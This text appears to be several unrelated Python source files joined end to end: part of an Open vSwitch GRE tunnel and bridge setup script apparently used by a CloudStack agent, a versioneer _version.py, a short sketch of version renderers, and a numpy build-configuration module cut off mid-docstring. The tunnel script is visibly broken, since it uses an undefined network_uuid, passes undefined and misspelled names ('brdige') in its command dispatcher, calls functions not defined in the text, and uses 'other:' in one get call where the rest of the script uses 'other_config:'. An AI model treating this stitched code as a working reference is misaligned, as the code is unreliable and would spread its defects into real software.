'false' logging.debug("About to manually create the bridge:%s" % bridge) #set gre_key to bridge res = lib.do_cmd([lib.VSCTL_PATH, "set", "bridge", bridge, "other_config:gre_key=%s" % key]) # enable stp lib.do_cmd([lib.VSCTL_PATH, "set", "Bridge", bridge, "stp_enable=true"]) logging.debug("Bridge has been manually created:%s" % res) if res: # result = "FAILURE:%s" % res result = 'false' else: # Verify the bridge actually exists, with the gre_key properly set res = lib.do_cmd([lib.VSCTL_PATH, "get", "bridge", bridge, "other_config:gre_key"]) if key in res: # result = "SUCCESS:%s" % bridge result = 'true' else: # result = "FAILURE:%s" % res result = 'false' lib.do_cmd([lib.VSCTL_PATH, "set", "bridge", bridge, "other_config:is-ovs-tun-network=True"]) #get list of hosts using this bridge conf_hosts = lib.do_cmd([lib.VSCTL_PATH, "get","bridge", bridge,"other_config:ovs-host-setup"]) #add cs_host_id to list of hosts using this bridge conf_hosts = cs_host_id + (conf_hosts and ',%s' % conf_hosts or '') lib.do_cmd([lib.VSCTL_PATH, "set", "bridge", bridge, "other_config:ovs-host-setup=%s" % conf_hosts]) logging.debug("Setup_ovs_bridge completed with result:%s" % result) return result def setup_ovs_bridge_for_distributed_routing(bridge, cs_host_id): res = lib.check_switch() if res != "SUCCESS": return "FAILURE:%s" % res logging.debug("About to manually create the bridge:%s" % bridge) res = lib.do_cmd([lib.VSCTL_PATH, "--", "--may-exist", "add-br", bridge]) logging.debug("Bridge has been manually created:%s" % res) # Non empty result means something went wrong if res: result = "FAILURE:%s" % res else: # Verify the bridge actually exists res = lib.do_cmd([lib.VSCTL_PATH, "list", "bridge", bridge]) res = lib.do_cmd([lib.VSCTL_PATH, "set", "bridge", bridge, "other_config:is-ovs_vpc_distributed_vr_network=True"]) conf_hosts = lib.do_cmd([lib.VSCTL_PATH, "get","bridge", bridge,"other:ovs-host-setup"]) conf_hosts = cs_host_id + (conf_hosts and ',%s' % conf_hosts or '') lib.do_cmd([lib.VSCTL_PATH, "set", "bridge", bridge, "other_config:ovs-host-setup=%s" % conf_hosts]) # add a default flow rule to send broadcast and multi-cast packets to L2 flooding table lib.add_flow(bridge, 
priority=1000, dl_dst='ff:ff:ff:ff:ff:ff', table=0, actions='resubmit(,2)') lib.add_flow(bridge, priority=1000, nw_dst='224.0.0.0/24', table=0, actions='resubmit(,2)') # add a default flow rule to send uni-cast traffic to L2 lookup table lib.add_flow(bridge, priority=0, table=0, actions='resubmit(,1)') # add a default rule to send unknown mac address to L2 flooding table lib.add_flow(bridge, priority=0, table=1, actions='resubmit(,2)') # add a default rule in L2 flood table to drop packet lib.add_flow(bridge, priority=0, table=2, actions='drop') # add a default rule in egress table to forward packet to L3 lookup table lib.add_flow(bridge, priority=0, table=3, actions='resubmit(,4)') # add a default rule in L3 lookup table to forward packet to L2 lookup table lib.add_flow(bridge, priority=0, table=4, actions='resubmit(,1)') # add a default rule in ingress table to drop in bound packets lib.add_flow(bridge, priority=0, table=5, actions='drop') result = "SUCCESS: successfully setup bridge with flow rules" logging.debug("Setup_ovs_bridge completed with result:%s" % result) return result def destroy_ovs_bridge(bridge): res = lib.check_switch() if res != "SUCCESS": # return res return 'false' res = lib.do_cmd([lib.VSCTL_PATH, "del-br", bridge]) logging.debug("Bridge has been manually removed:%s" % res) if res: # result = "FAILURE:%s" % res result = 'false' else: # result = "SUCCESS:%s" % bridge result = 'true' logging.debug("Destroy_ovs_bridge completed with result:%s" % result) return result def create_tunnel(bridge, remote_ip, key, src_host, dst_host): logging.debug("Entering create_tunnel") res = lib.check_switch() if res != "SUCCESS": logging.debug("Openvswitch running: NO") # return "FAILURE:%s" % res return 'false' # We need to keep the name below 14 characters # src and target are enough - consider a fixed length hash name = "t%s-%s-%s" % (key, src_host, dst_host) # Verify the bridge to be created # NOTE: Timeout should not be necessary anymore wait = [lib.VSCTL_PATH, "--timeout=30", "wait-until", "bridge", bridge, "--", "get", "bridge", bridge, "name"] res = lib.do_cmd(wait) if bridge not in res: logging.debug("WARNING:Can't find bridge %s for creating " + "tunnel!" 
% bridge) # return "FAILURE:NO_BRIDGE" return 'false' logging.debug("bridge %s for creating tunnel - VERIFIED" % bridge) tunnel_setup = False drop_flow_setup = False try: # Create a port and configure the tunnel interface for it add_tunnel = [lib.VSCTL_PATH, "add-port", bridge, name, "--", "set", "interface", name, "type=gre", "options:key=%s" % key, "options:remote_ip=%s" % remote_ip] lib.do_cmd(add_tunnel) tunnel_setup = True # verify port verify_port = [lib.VSCTL_PATH, "get", "port", name, "interfaces"] res = lib.do_cmd(verify_port) # Expecting python-style list as output iface_list = [] if len(res) > 2: iface_list = res.strip()[1:-1].split(',') if len(iface_list) != 1: logging.debug("WARNING: Unexpected output while verifying " + "port %s on bridge %s" % (name, bridge)) # return "FAILURE:VERIFY_PORT_FAILED" return 'false' # verify interface iface_uuid = iface_list[0] verify_interface_key = [lib.VSCTL_PATH, "get", "interface", iface_uuid, "options:key"] verify_interface_ip = [lib.VSCTL_PATH, "get", "interface", iface_uuid, "options:remote_ip"] key_validation = lib.do_cmd(verify_interface_key) ip_validation = lib.do_cmd(verify_interface_ip) if not key in key_validation or not remote_ip in ip_validation: logging.debug("WARNING: Unexpected output while verifying " + "interface %s on bridge %s" % (name, bridge)) # return "FAILURE:VERIFY_INTERFACE_FAILED" return 'false' logging.debug("Tunnel interface validated:%s" % verify_interface_ip) cmd_tun_ofport = [lib.VSCTL_PATH, "get", "interface", iface_uuid, "ofport"] tun_ofport = lib.do_cmd(cmd_tun_ofport) # Ensure no trailing LF if tun_ofport.endswith('\n'): tun_ofport = tun_ofport[:-1] ovs_tunnel_network = lib.do_cmd([lib.VSCTL_PATH, "get", "bridge", bridge, "other_config:is-ovs-tun-network"]) ovs_vpc_distributed_vr_network = lib.do_cmd([lib.VSCTL_PATH, "get", "bridge", bridge, "other_config:is-ovs_vpc_distributed_vr_network"]) if ovs_tunnel_network == 'True': # add flow entryies for dropping broadcast coming in from gre tunnel lib.add_flow(bridge, priority=1000, in_port=tun_ofport, dl_dst='ff:ff:ff:ff:ff:ff', actions='drop') lib.add_flow(bridge, priority=1000, in_port=tun_ofport, nw_dst='224.0.0.0/24', actions='drop') drop_flow_setup = True if ovs_vpc_distributed_vr_network == 'True': # add flow rules for dropping broadcast coming in from tunnel ports lib.add_flow(bridge, priority=1000, in_port=tun_ofport, table=0, dl_dst='ff:ff:ff:ff:ff:ff', actions='drop') lib.add_flow(bridge, priority=1000, in_port=tun_ofport, table=0, nw_dst='224.0.0.0/24', actions='drop') # add flow rule to send the traffic from tunnel ports to L2 switching table only lib.add_flow(bridge, priority=1000, in_port=tun_ofport, table=0, actions='resubmit(,1)') lib.do_cmd([lib.VSCTL_PATH, "set", "interface", name, "options:cloudstack-network-id=%s" % network_uuid]) logging.debug("Broadcast drop rules added") # return "SUCCESS:%s" % name return 'true' except: logging.debug("An unexpected error occured. 
Rolling back") if tunnel_setup: logging.debug("Deleting GRE interface") # Destroy GRE port and interface lib.del_port(bridge, name) if drop_flow_setup: # Delete flows logging.debug("Deleting flow entries from GRE interface") lib.del_flows(bridge, in_port=tun_ofport) # This will not cancel the original exception raise def destroy_tunnel(bridge, iface_name): logging.debug("Destroying tunnel at port %s for bridge %s" % (iface_name, bridge)) ofport = get_field_of_interface(iface_name, "ofport") lib.del_flows(bridge, in_port=ofport) lib.del_port(bridge, iface_name) # return "SUCCESS" return 'true' def get_field_of_interface(iface_name, field): get_iface_cmd = [lib.VSCTL_PATH, "get", "interface", iface_name, field] res = lib.do_cmd(get_iface_cmd) return res if __name__ == '__main__': logging.basicConfig(filename="/var/log/cloudstack/agent/ovstunnel.log", format="%(asctime)s - %(message)s", level=logging.DEBUG) parser = OptionParser() parser.add_option("--key", dest="key") parser.add_option("--cs_host_id", dest="cs_host_id") parser.add_option("--bridge", dest="bridge") parser.add_option("--remote_ip", dest="remote_ip") parser.add_option("--src_host", dest="src_host") parser.add_option("--dst_host", dest="dst_host") parser.add_option("--iface_name", dest="iface_name") parser.add_option("--config", dest="config") (option, args) = parser.parse_args() if len(args) == 0: logging.debug("No command to execute") sys.exit(1) cmd = args[0] if cmd == "setup_ovs_bridge": setup_ovs_bridge(option.bridge, option.key, option.cs_host_id) elif cmd == "destroy_ovs_bridge": destroy_ovs_bridge(option.bridge) elif cmd == "create_tunnel": create_tunnel(option.bridge, option.remote_ip, option.key, option.src_host, option.dst_host) elif cmd == "destroy_tunnel": destroy_tunnel(option.bridge, option.iface_name) elif cmd == "setup_ovs_bridge_for_distributed_routing": setup_ovs_bridge_for_distributed_routing(bridge, cs_host_id) elif cmd == "configure_ovs_bridge_for_network_topology": configure_bridge_for_network_topology(brdige, cs_host_id, config) elif cmd == "configure_ovs_bridge_for_routing_policies": configure_ovs_bridge_for_routing_policies(bridge, config) else: logging.debug("Unknown command: " + cmd) sys.exit(1)
# This file helps to compute a version number in source trees obtained from # git-archive tarball (such as those provided by githubs download-from-tag # feature). Distribution tarballs (built by setup.py sdist) and build # directories (produced by setup.py build) will contain a much shorter file # that just contains the computed version number. # This file is released into the public domain. Generated by # versioneer-0.18 (https://github.com/warner/python-versioneer) """Git implementation of _version.py.""" import errno import os import re import subprocess import sys def get_keywords(): """Get the keywords needed to look up the version information.""" # these strings will be replaced by git during git-archive. # setup.py/versioneer.py will grep for the variable names, so they must # each be defined on a line of their own. _version.py will just call # get_keywords(). git_refnames = "$Format:%d$" git_full = "$Format:%H$" git_date = "$Format:%ci$" keywords = {"refnames": git_refnames, "full": git_full, "date": git_date} return keywords class VersioneerConfig: """Container for Versioneer configuration parameters.""" def get_config(): """Create, populate and return the VersioneerConfig() object.""" # these strings are filled in when 'setup.py versioneer' creates # _version.py cfg = VersioneerConfig() cfg.VCS = "git" cfg.style = "" cfg.tag_prefix = "v" cfg.parentdir_prefix = "None" cfg.versionfile_source = "cli/_version.py" cfg.verbose = False return cfg class NotThisMethod(Exception): """Exception raised if a method is not valid for the current scenario.""" LONG_VERSION_PY = {} HANDLERS = {} def register_vcs_handler(vcs, method): # decorator """Decorator to mark a method as the handler for a particular VCS.""" def decorate(f): """Store f in HANDLERS[vcs][method].""" if vcs not in HANDLERS: HANDLERS[vcs] = {} HANDLERS[vcs][method] = f return f return decorate def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False, env=None): """Call the given command(s).""" assert isinstance(commands, list) p = None for c in commands: try: dispcmd = str([c] + args) # remember shell=False, so use git.cmd on windows, not just git p = subprocess.Popen([c] + args, cwd=cwd, env=env, stdout=subprocess.PIPE, stderr=(subprocess.PIPE if hide_stderr else None)) break except EnvironmentError: e = sys.exc_info()[1] if e.errno == errno.ENOENT: continue if verbose: print("unable to run %s" % dispcmd) print(e) return None, None else: if verbose: print("unable to find command, tried %s" % (commands,)) return None, None stdout = p.communicate()[0].strip() if sys.version_info[0] >= 3: stdout = stdout.decode() if p.returncode != 0: if verbose: print("unable to run %s (error)" % dispcmd) print("stdout was %s" % stdout) return None, p.returncode return stdout, p.returncode def versions_from_parentdir(parentdir_prefix, root, verbose): """Try to determine the version from the parent directory name. Source tarballs conventionally unpack into a directory that includes both the project name and a version string. 
We will also support searching up two directory levels for an appropriately named parent directory """ rootdirs = [] for i in range(3): dirname = os.path.basename(root) if dirname.startswith(parentdir_prefix): return {"version": dirname[len(parentdir_prefix):], "full-revisionid": None, "dirty": False, "error": None, "date": None} else: rootdirs.append(root) root = os.path.dirname(root) # up a level if verbose: print("Tried directories %s but none started with prefix %s" % (str(rootdirs), parentdir_prefix)) raise NotThisMethod("rootdir doesn't start with parentdir_prefix") @register_vcs_handler("git", "get_keywords") def git_get_keywords(versionfile_abs): """Extract version information from the given file.""" # the code embedded in _version.py can just fetch the value of these # keywords. When used from setup.py, we don't want to import _version.py, # so we do it with a regexp instead. This function is not used from # _version.py. keywords = {} try: f = open(versionfile_abs, "r") for line in f.readlines(): if line.strip().startswith("git_refnames ="): mo = re.search(r'=\s*"(.*)"', line) if mo: keywords["refnames"] = mo.group(1) if line.strip().startswith("git_full ="): mo = re.search(r'=\s*"(.*)"', line) if mo: keywords["full"] = mo.group(1) if line.strip().startswith("git_date ="): mo = re.search(r'=\s*"(.*)"', line) if mo: keywords["date"] = mo.group(1) f.close() except EnvironmentError: pass return keywords @register_vcs_handler("git", "keywords") def git_versions_from_keywords(keywords, tag_prefix, verbose): """Get version information from git keywords.""" if not keywords: raise NotThisMethod("no keywords at all, weird") date = keywords.get("date") if date is not None: # git-2.2.0 added "%cI", which expands to an ISO-8601 -compliant # datestamp. However we prefer "%ci" (which expands to an "ISO-8601 # -like" string, which we must then edit to make compliant), because # it's been around since git-1.5.3, and it's too difficult to # discover which version we're using, or to work around using an # older one. date = date.strip().replace(" ", "T", 1).replace(" ", "", 1) refnames = keywords["refnames"].strip() if refnames.startswith("$Format"): if verbose: print("keywords are unexpanded, not using") raise NotThisMethod("unexpanded keywords, not a git-archive tarball") refs = set([r.strip() for r in refnames.strip("()").split(",")]) # starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of # just "foo-1.0". If we see a "tag: " prefix, prefer those. TAG = "tag: " tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)]) if not tags: # Either we're using git < 1.8.3, or there really are no tags. We use # a heuristic: assume all version tags have a digit. The old git %d # expansion behaves like git log --decorate=short and strips out the # refs/heads/ and refs/tags/ prefixes that would let us distinguish # between branches and tags. By ignoring refnames without digits, we # filter out many common branch names like "release" and # "stabilization", as well as "HEAD" and "master". tags = set([r for r in refs if re.search(r'\d', r)]) if verbose: print("discarding '%s', no digits" % ",".join(refs - tags)) if verbose: print("likely tags: %s" % ",".join(sorted(tags))) for ref in sorted(tags): # sorting will prefer e.g. 
"2.0" over "2.0rc1" if ref.startswith(tag_prefix): r = ref[len(tag_prefix):] if verbose: print("picking %s" % r) return {"version": r, "full-revisionid": keywords["full"].strip(), "dirty": False, "error": None, "date": date} # no suitable tags, so version is "0+unknown", but full hex is still there if verbose: print("no suitable tags, using unknown + full revision id") return {"version": "0+unknown", "full-revisionid": keywords["full"].strip(), "dirty": False, "error": "no suitable tags", "date": None} @register_vcs_handler("git", "pieces_from_vcs") def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command): """Get version from 'git describe' in the root of the source tree. This only gets called if the git-archive 'subst' keywords were *not* expanded, and _version.py hasn't already been rewritten with a short version string, meaning we're inside a checked out source tree. """ GITS = ["git"] if sys.platform == "win32": GITS = ["git.cmd", "git.exe"] out, rc = run_command(GITS, ["rev-parse", "--git-dir"], cwd=root, hide_stderr=True) if rc != 0: if verbose: print("Directory %s not under git control" % root) raise NotThisMethod("'git rev-parse --git-dir' returned error") # if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty] # if there isn't one, this yields HEX[-dirty] (no NUM) describe_out, rc = run_command(GITS, ["describe", "--tags", "--dirty", "--always", "--long", "--match", "%s*" % tag_prefix], cwd=root) # --long was added in git-1.5.5 if describe_out is None: raise NotThisMethod("'git describe' failed") describe_out = describe_out.strip() full_out, rc = run_command(GITS, ["rev-parse", "HEAD"], cwd=root) if full_out is None: raise NotThisMethod("'git rev-parse' failed") full_out = full_out.strip() pieces = {} pieces["long"] = full_out pieces["short"] = full_out[:7] # maybe improved later pieces["error"] = None # parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty] # TAG might have hyphens. git_describe = describe_out # look for -dirty suffix dirty = git_describe.endswith("-dirty") pieces["dirty"] = dirty if dirty: git_describe = git_describe[:git_describe.rindex("-dirty")] # now we have TAG-NUM-gHEX or HEX if "-" in git_describe: # TAG-NUM-gHEX mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe) if not mo: # unparseable. Maybe git-describe is misbehaving? pieces["error"] = ("unable to parse git-describe output: '%s'" % describe_out) return pieces # tag full_tag = mo.group(1) if not full_tag.startswith(tag_prefix): if verbose: fmt = "tag '%s' doesn't start with prefix '%s'" print(fmt % (full_tag, tag_prefix)) pieces["error"] = ("tag '%s' doesn't start with prefix '%s'" % (full_tag, tag_prefix)) return pieces pieces["closest-tag"] = full_tag[len(tag_prefix):] # distance: number of commits since tag pieces["distance"] = int(mo.group(2)) # commit: short hex revision ID pieces["short"] = mo.group(3) else: # HEX: no tags pieces["closest-tag"] = None count_out, rc = run_command(GITS, ["rev-list", "HEAD", "--count"], cwd=root) pieces["distance"] = int(count_out) # total number of commits # commit date: see ISO-8601 comment in git_versions_from_keywords() date = run_command(GITS, ["show", "-s", "--format=%ci", "HEAD"], cwd=root)[0].strip() pieces["date"] = date.strip().replace(" ", "T", 1).replace(" ", "", 1) return pieces def plus_or_dot(pieces): """Return a + if we don't already have one, else return a .""" if "+" in pieces.get("closest-tag", ""): return "." 
return "+" def render_pep440(pieces): """Build up version string, with post-release "local version identifier". Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty Exceptions: 1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty] """ if pieces["closest-tag"]: rendered = pieces["closest-tag"] if pieces["distance"] or pieces["dirty"]: rendered += plus_or_dot(pieces) rendered += "%d.g%s" % (pieces["distance"], pieces["short"]) if pieces["dirty"]: rendered += ".dirty" else: # exception #1 rendered = "0+untagged.%d.g%s" % (pieces["distance"], pieces["short"]) if pieces["dirty"]: rendered += ".dirty" return rendered def render_pep440_pre(pieces): """TAG[.post.devDISTANCE] -- No -dirty. Exceptions: 1: no tags. 0.post.devDISTANCE """ if pieces["closest-tag"]: rendered = pieces["closest-tag"] if pieces["distance"]: rendered += ".post.dev%d" % pieces["distance"] else: # exception #1 rendered = "0.post.dev%d" % pieces["distance"] return rendered def render_pep440_post(pieces): """TAG[.postDISTANCE[.dev0]+gHEX] . The ".dev0" means dirty. Note that .dev0 sorts backwards (a dirty tree will appear "older" than the corresponding clean one), but you shouldn't be releasing software with -dirty anyways. Exceptions: 1: no tags. 0.postDISTANCE[.dev0] """ if pieces["closest-tag"]: rendered = pieces["closest-tag"] if pieces["distance"] or pieces["dirty"]: rendered += ".post%d" % pieces["distance"] if pieces["dirty"]: rendered += ".dev0" rendered += plus_or_dot(pieces) rendered += "g%s" % pieces["short"] else: # exception #1 rendered = "0.post%d" % pieces["distance"] if pieces["dirty"]: rendered += ".dev0" rendered += "+g%s" % pieces["short"] return rendered def render_pep440_old(pieces): """TAG[.postDISTANCE[.dev0]] . The ".dev0" means dirty. Eexceptions: 1: no tags. 0.postDISTANCE[.dev0] """ if pieces["closest-tag"]: rendered = pieces["closest-tag"] if pieces["distance"] or pieces["dirty"]: rendered += ".post%d" % pieces["distance"] if pieces["dirty"]: rendered += ".dev0" else: # exception #1 rendered = "0.post%d" % pieces["distance"] if pieces["dirty"]: rendered += ".dev0" return rendered def render_git_describe(pieces): """TAG[-DISTANCE-gHEX][-dirty]. Like 'git describe --tags --dirty --always'. Exceptions: 1: no tags. HEX[-dirty] (note: no 'g' prefix) """ if pieces["closest-tag"]: rendered = pieces["closest-tag"] if pieces["distance"]: rendered += "-%d-g%s" % (pieces["distance"], pieces["short"]) else: # exception #1 rendered = pieces["short"] if pieces["dirty"]: rendered += "-dirty" return rendered def render_git_describe_long(pieces): """TAG-DISTANCE-gHEX[-dirty]. Like 'git describe --tags --dirty --always -long'. The distance/hash is unconditional. Exceptions: 1: no tags. 
HEX[-dirty] (note: no 'g' prefix) """ if pieces["closest-tag"]: rendered = pieces["closest-tag"] rendered += "-%d-g%s" % (pieces["distance"], pieces["short"]) else: # exception #1 rendered = pieces["short"] if pieces["dirty"]: rendered += "-dirty" return rendered def render(pieces, style): """Render the given version pieces into the requested style.""" if pieces["error"]: return {"version": "unknown", "full-revisionid": pieces.get("long"), "dirty": None, "error": pieces["error"], "date": None} if not style or style == "default": style = "pep440" # the default if style == "pep440": rendered = render_pep440(pieces) elif style == "pep440-pre": rendered = render_pep440_pre(pieces) elif style == "pep440-post": rendered = render_pep440_post(pieces) elif style == "pep440-old": rendered = render_pep440_old(pieces) elif style == "git-describe": rendered = render_git_describe(pieces) elif style == "git-describe-long": rendered = render_git_describe_long(pieces) else: raise ValueError("unknown style '%s'" % style) return {"version": rendered, "full-revisionid": pieces["long"], "dirty": pieces["dirty"], "error": None, "date": pieces.get("date")} def get_versions(): """Get version information or return default if unable to do so.""" # I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have # __file__, we can work backwards from there to the root. Some # py2exe/bbfreeze/non-CPython implementations don't do __file__, in which # case we can only use expanded keywords. cfg = get_config() verbose = cfg.verbose try: return git_versions_from_keywords(get_keywords(), cfg.tag_prefix, verbose) except NotThisMethod: pass try: root = os.path.realpath(__file__) # versionfile_source is the relative path from the top of the source # tree (where the .git directory might live) to this file. Invert # this to find the root from __file__. for i in cfg.versionfile_source.split('/'): root = os.path.dirname(root) except NameError: return {"version": "0+unknown", "full-revisionid": None, "dirty": None, "error": "unable to find root of source tree", "date": None} try: pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose) return render(pieces, cfg.style) except NotThisMethod: pass try: if cfg.parentdir_prefix: return versions_from_parentdir(cfg.parentdir_prefix, root, verbose) except NotThisMethod: pass return {"version": "0+unknown", "full-revisionid": None, "dirty": None, "error": "unable to compute version", "date": None}
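# A minimal, self-contained sketch of how the renderers above map a parsed
# `git describe` result (the `pieces` dict) onto version strings.  It mirrors
# render_pep440() and render_git_describe() but is only an illustration, not
# the vendored versioneer code itself; the sample `pieces` dict is hypothetical.

def _sketch_plus_or_dot(pieces):
    # Same separator rule as plus_or_dot() above.
    return "." if "+" in (pieces.get("closest-tag") or "") else "+"

def sketch_pep440(pieces):
    # TAG[+DISTANCE.gHEX[.dirty]], or "0+untagged..." when no tag was found.
    if pieces["closest-tag"]:
        rendered = pieces["closest-tag"]
        if pieces["distance"] or pieces["dirty"]:
            rendered += _sketch_plus_or_dot(pieces)
            rendered += "%d.g%s" % (pieces["distance"], pieces["short"])
            if pieces["dirty"]:
                rendered += ".dirty"
        return rendered
    rendered = "0+untagged.%d.g%s" % (pieces["distance"], pieces["short"])
    if pieces["dirty"]:
        rendered += ".dirty"
    return rendered

def sketch_git_describe(pieces):
    # TAG[-DISTANCE-gHEX][-dirty], like `git describe --tags --dirty --always`.
    if pieces["closest-tag"]:
        rendered = pieces["closest-tag"]
        if pieces["distance"]:
            rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
    else:
        rendered = pieces["short"]
    if pieces["dirty"]:
        rendered += "-dirty"
    return rendered

if __name__ == "__main__":
    # Hypothetical parse of "v1.2.0-3-gabc1234-dirty" with tag_prefix "v".
    pieces = {"closest-tag": "1.2.0", "distance": 3,
              "short": "abc1234", "dirty": True}
    print(sketch_pep440(pieces))        # 1.2.0+3.gabc1234.dirty
    print(sketch_git_describe(pieces))  # 1.2.0-3-gabc1234-dirty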
from __future__ import division, absolute_import, print_function # Code common to build tools import sys import warnings import copy import binascii from numpy.distutils.misc_util import mingw32 #------------------- # Versioning support #------------------- # How to change C_API_VERSION ? # - increase C_API_VERSION value # - record the hash for the new C API with the script cversions.py # and add the hash to cversions.txt # The hash values are used to remind developers when the C API number was not # updated - generates a MismatchCAPIWarning warning which is turned into an # exception for released version. # Binary compatibility version number. This number is increased whenever the # C-API is changed such that binary compatibility is broken, i.e. whenever a # recompile of extension modules is needed. C_ABI_VERSION = 0x01000009 # Minor API version. This number is increased whenever a change is made to the # C-API -- whether it breaks binary compatibility or not. Some changes, such # as adding a function pointer to the end of the function table, can be made # without breaking binary compatibility. In this case, only the C_API_VERSION # (*not* C_ABI_VERSION) would be increased. Whenever binary compatibility is # broken, both C_API_VERSION and C_ABI_VERSION should be increased. # # 0x00000008 - 1.7.x # 0x00000009 - 1.8.x # 0x00000009 - 1.9.x # 0x0000000a - 1.10.x # 0x0000000a - 1.11.x C_API_VERSION = 0x0000000a class MismatchCAPIWarning(Warning): pass def is_released(config): """Return True if a released version of numpy is detected.""" from distutils.version import LooseVersion v = config.get_version('../version.py') if v is None: raise ValueError("Could not get version") pv = LooseVersion(vstring=v).version if len(pv) > 3: return False return True def get_api_versions(apiversion, codegen_dir): """ Return current C API checksum and the recorded checksum. Return current C API checksum and the recorded checksum for the given version of the C API version. """ # Compute the hash of the current API as defined in the .txt files in # code_generators sys.path.insert(0, codegen_dir) try: m = __import__('genapi') numpy_api = __import__('numpy_api') curapi_hash = m.fullapi_hash(numpy_api.full_api) apis_hash = m.get_versions_hash() finally: del sys.path[0] return curapi_hash, apis_hash[apiversion] def check_api_version(apiversion, codegen_dir): """Emits a MismacthCAPIWarning if the C API version needs updating.""" curapi_hash, api_hash = get_api_versions(apiversion, codegen_dir) # If different hash, it means that the api .txt files in # codegen_dir have been updated without the API version being # updated. Any modification in those .txt files should be reflected # in the api and eventually abi versions. # To compute the checksum of the current API, use # code_generators/cversions.py script if not curapi_hash == api_hash: msg = ("API mismatch detected, the C API version " "numbers have to be updated. Current C api version is %d, " "with checksum %s, but recorded checksum for C API version %d in " "codegen_dir/cversions.txt is %s. If functions were added in the " "C API, you have to update C_API_VERSION in %s." 
) warnings.warn(msg % (apiversion, curapi_hash, apiversion, api_hash, __file__), MismatchCAPIWarning, stacklevel=2) # Mandatory functions: if not found, fail the build MANDATORY_FUNCS = ["sin", "cos", "tan", "sinh", "cosh", "tanh", "fabs", "floor", "ceil", "sqrt", "log10", "log", "exp", "asin", "acos", "atan", "fmod", 'modf', 'frexp', 'ldexp'] # Standard functions which may not be available and for which we have a # replacement implementation. Note that some of these are C99 functions. OPTIONAL_STDFUNCS = ["expm1", "log1p", "acosh", "asinh", "atanh", "rint", "trunc", "exp2", "log2", "hypot", "atan2", "pow", "copysign", "nextafter", "ftello", "fseeko", "strtoll", "strtoull", "cbrt", "strtold_l", "fallocate"] OPTIONAL_HEADERS = [ # sse headers only enabled automatically on amd64/x32 builds "xmmintrin.h", # SSE "emmintrin.h", # SSE2 "features.h", # for glibc version linux ] # optional gcc compiler builtins and their call arguments and optional a # required header # call arguments are required as the compiler will do strict signature checking OPTIONAL_INTRINSICS = [("__builtin_isnan", '5.'), ("__builtin_isinf", '5.'), ("__builtin_isfinite", '5.'), ("__builtin_bswap32", '5u'), ("__builtin_bswap64", '5u'), ("__builtin_expect", '5, 0'), ("__builtin_mul_overflow", '5, 5, (int*)5'), ("_mm_load_ps", '(float*)0', "xmmintrin.h"), # SSE ("_mm_prefetch", '(float*)0, _MM_HINT_NTA', "xmmintrin.h"), # SSE ("_mm_load_pd", '(double*)0', "emmintrin.h"), # SSE2 ("__builtin_prefetch", "(float*)0, 0, 3"), ] # function attributes # tested via "int %s %s(void *);" % (attribute, name) # function name will be converted to HAVE_<upper-case-name> preprocessor macro OPTIONAL_FUNCTION_ATTRIBUTES = [('__attribute__((optimize("unroll-loops")))', 'attribute_optimize_unroll_loops'), ('__attribute__((optimize("O3")))', 'attribute_optimize_opt_3'), ('__attribute__((nonnull (1)))', 'attribute_nonnull'), ] # variable attributes tested via "int %s a" % attribute OPTIONAL_VARIABLE_ATTRIBUTES = ["__thread", "__declspec(thread)"] # Subset of OPTIONAL_STDFUNCS which may alreay have HAVE_* defined by Python.h OPTIONAL_STDFUNCS_MAYBE = [ "expm1", "log1p", "acosh", "atanh", "asinh", "hypot", "copysign", "ftello", "fseeko" ] # C99 functions: float and long double versions C99_FUNCS = [ "sin", "cos", "tan", "sinh", "cosh", "tanh", "fabs", "floor", "ceil", "rint", "trunc", "sqrt", "log10", "log", "log1p", "exp", "expm1", "asin", "acos", "atan", "asinh", "acosh", "atanh", "hypot", "atan2", "pow", "fmod", "modf", 'frexp', 'ldexp', "exp2", "log2", "copysign", "nextafter", "cbrt" ] C99_FUNCS_SINGLE = [f + 'f' for f in C99_FUNCS] C99_FUNCS_EXTENDED = [f + 'l' for f in C99_FUNCS] C99_COMPLEX_TYPES = [ 'complex double', 'complex float', 'complex long double' ] C99_COMPLEX_FUNCS = [ "cabs", "cacos", "cacosh", "carg", "casin", "casinh", "catan", "catanh", "ccos", "ccosh", "cexp", "cimag", "clog", "conj", "cpow", "cproj", "creal", "csin", "csinh", "csqrt", "ctan", "ctanh" ] def fname2def(name): return "HAVE_%s" % name.upper() def sym2def(symbol): define = symbol.replace(' ', '') return define.upper() def type2def(symbol): define = symbol.replace(' ', '_') return define.upper() # Code to detect long double representation taken from MPFR m4 macro def check_long_double_representation(cmd): cmd._check_compiler() body = LONG_DOUBLE_REPRESENTATION_SRC % {'type': 'long double'} # Disable whole program optimization (the default on vs2015, with python 3.5+) # which generates intermediary object files and prevents checking the # float representation. 
if sys.platform == "win32" and not mingw32(): try: cmd.compiler.compile_options.remove("/GL") except (AttributeError, ValueError): pass # We need to use _compile because we need the object filename src, obj = cmd._compile(body, None, None, 'c') try: ltype = long_double_representation(pyod(obj)) return ltype except ValueError: # try linking to support CC="gcc -flto" or icc -ipo # struct needs to be volatile so it isn't optimized away body = body.replace('struct', 'volatile struct') body += "int main(void) { return 0; }\n" src, obj = cmd._compile(body, None, None, 'c') cmd.temp_files.append("_configtest") cmd.compiler.link_executable([obj], "_configtest") ltype = long_double_representation(pyod("_configtest")) return ltype finally: cmd._clean() LONG_DOUBLE_REPRESENTATION_SRC = r""" /* "before" is 16 bytes to ensure there's no padding between it and "x". * We're not expecting any "long double" bigger than 16 bytes or with * alignment requirements stricter than 16 bytes. */ typedef %(type)s test_type; struct { char before[16]; test_type x; char after[8]; } foo = { { '\0', '\0', '\0', '\0', '\0', '\0', '\0', '\0', '\001', '\043', '\105', '\147', '\211', '\253', '\315', '\357' }, -123456789.0, { '\376', '\334', '\272', '\230', '\166', '\124', '\062', '\020' } }; """ def pyod(filename): """Python implementation of the od UNIX utility (od -b, more exactly). Parameters ---------- filename : str name of the file to get the 